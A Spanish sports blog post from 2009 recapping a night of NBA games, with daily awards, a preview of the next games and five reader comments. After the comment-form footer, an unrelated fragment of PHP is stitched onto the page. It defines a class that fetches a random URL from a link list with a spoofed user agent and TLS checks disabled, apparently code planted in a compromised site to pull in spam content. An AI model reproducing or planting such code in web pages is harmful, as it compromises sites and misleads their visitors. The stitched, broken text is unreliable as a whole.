La Crónica (17/11/2009)

18 de November de 2009 por MagicJohnson32

¿Será posible que los Suns hayan encontrado por fin la fórmula? Anoche fueron los primeros en alcanzar las 10 victorias (por tan sólo 2 derrotas) mostrando un interesante equilibrio entre el habitual vertiginoso juego ofensivo y la, en ellos, menos habitual eficaz defensa. Todo en la complicada plaza del Toyota Center de Houston. Nash en modo MVP, como en los viejos tiempos, Stat y Richardson de ejecutores (también como en los viejos tiempos), los triples de Frye (como nunca en su vida), el buen hacer de Hill, Barbosa, Dudley… casi parece un equipo más compensado que en las mejores etapas de D’Antoni.

Hablemos de los perseguidores. Los Lakers anoche no tuvieron que sudar mucho para deshacerse de los Pistons. Es más fácil sin Hamilton, Prince y con Villanueva todavía en modo contemplativo o con problemas de adaptación o como quiera él llamarlo (jugando como el cu… en términos profanos). Kobe jugando 40 minutos, también en modo MVP, mientras Vujacic no juega ni los minutos de la basura. Bien Bynum, bien el resto del banco, pero a Odom le sobra jugar de titular. Él es el hombre que más necesita el regreso de Pau, para que luego se queje.

Por su parte, los nuevos Warriors con Radmanovic a la cabeza jugando de 4, sí que fueron capaces de poner en apuros a unos Cavs sin Shaq. Pero cómo no, el mejor partido de la vida de Hickson y un doble doble sin despeinarse de LeBron dejaron las dificultades en el “casi” en el que terminan las mejores actuaciones del (llamémosle) equipo de Nelson.

Los Nuggets también hicieron los deberes, a pesar de unas inoportunas migrañas que sufría Carmelo y que le dejaron en “sólo” 32 puntos con una serie de 12 de 15 en tiros. 130 puntos que les endosaron a los Raptors sin Turkoglu. La defensa de los canadienses va cogiendo la misma senda que la de los Warriors.

Miami padeció la dura defensa que ya venimos avisando suelen implementar los Thunder, además del partidazo de Durant. Wade se quedó en un pobre 30%, como Beasley que ni se enteró de qué iba la película.

Por su parte los Bulls rompieron la racha de los Kings, los Pacers incrementaron el terrorífico inicio de los Nets y los Hornets se tomaron un respiro gracias a los Clippers.

PREMIOS

MVP: Lebron James y Kevin Durant parecen abonados a este premio en caso de victoria de sus equipos pero los 40 puntos de Kobe Bryant en la victoria de los Lakers frente a los Pistons les deja con la miel en los labios.

Rookie: Tyreke Evans sigue a su ritmo pero hoy hemos de destacar obligatoriamente el primer buen partido de DeMar DeRozan (17 puntos) y la buena actuación de Darren Collison sustituyendo (es un decir) a Chris Paul, 12 puntos y 6 asistencias.

Sorpresa: Ojito que no es el primer buen partido de JJ Hickson como titular en los Cavs, 21 puntos sin fallo y 9 rebotes. Gran partido también de Donte Greene que salió de titular debido a la ausencia de Andres Nocioni (24 puntos) y Carl Landry (27 puntos, 9 rebotes). En Houston cuando no es uno es otro pero siempre alguien da el callo.

Decepción: A la espera del debut de Blake Griffin, de momento James Harden se postula como una de las grandes decepciones del draft. Su partido de ayer fue de nuevo muy pobre. Aún más triste fue la actuación de Michael Beasley en el mismo encuentro: 8 puntos, 0 rebotes y 0 asistencias…

Esfuerzo en vano: Es para estar al borde de las lágrimas. Entre Brook Lopez y Chris Douglas-Roberts anotaron 53 puntos y capturaron 28 rebotes pero ni así logran ganar un partido. Y ya van 11 derrotas consecutivas.

RAZONES PARA TRASNOCHAR

Una docena de partidos nos esperan esta madrugada así que seguro que habrá para todos los gustos. A la 01h00 los enrachados Hawks reciben a los Heat con el objetivo de mantener su casillero de derrotas a 0 como locales. A la misma hora, en la capital reciben a Lebron con lo que eso conlleva desde hace un tiempo. A las 02h00 veremos si la sensación de la liga, Brandon Jennings, pone en 12 la marca de derrotas de los Nets. A las 03h30 duelo tejanos en Dallas, en el que los Spurs esperan ganar su primer partido fuera de casa. Para cerrar la jornada, a las 04h00 los Blazers reciben a Detroit con la ‘formula McMillan’ de nuevo en pista. También saltarán a la cancha los equipos de Marc Gasol y Jose Calderón, ambos contra equipos asequibles como están siendo Clippers y Jazz.

VIDEO

Vámonos con las 1o mejores jugadas del día. No os perdáis los 2 canastones de Kobe y la horma de su zapato que encontró anoche Shannon Brown…

Comenta

5 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Me he quedado con las ganas de que dijéramos algo de los muy buenos 20 minutitos de Sergio contra los Bulls, con 9 puntitos con buenos porcentajes, 5 asistencias, 3 rebotes y 1 robo.
    Esperemos que no sea flor de un día y que Westphal empiece a contar con él algo más.

      Citar

  2. HeiNeKeN dice:
    #2

    vaya taponazos los de Andersen y Maxiell… bufff

      Citar

  3. sergio dice:
    #3

    Estos Houston le plantan cara a todo el mundo. Pena que no este Yao

    http://www.youtube.com/watch?v=ohHoK4-LeuY&feature=player_embedded

      Citar

  4. Q dice:
    #4

    Los buenos minutos de Sergio no fueron solo estadistica que esta a veces engaña.

    Salio unos minutos en la primera parte y anoto 6 puntos, los comentaristas americanos decian que Sacramento seguia vivo gracias a la aportacion de Sergio.

    Posteriormente en el cuarto cuarto asumio el mando del equipo (habia jugado unos minutos de escolta, sic) y dio las cinco asistencias, ademas el robo lo hizo en una contra de chicago cuando estaba sacramento con un jugador menos ya que tenia un jugador caido en el suelo.

    En cuanto sergio perdio fuelle los bulls lograron finalmente irse en el marcador. Estoy seguro que tendra mas minutos ya que la actuacion fue muy buena, las camaras se centraban en el constamente de hecho.
    Ademas que Tyreke de base no tiene nada, pero nada de nada, es un escolta de toda la vida.

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    Monumento continuo a Houston,,sí Sergio..

    Vaya crack este Don Nelson,,,o vaya capacidad de chocheo..o sea,, Radmanovic normalmente no se entera,,,pues nada,,,llega del traspaso y titular.

    Por cierto,,encantado estará Radmanovic de volver a California,,,,,no mal clima del todo y tiene las pistas de esquí a tiro de piedra,,,o eso creo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>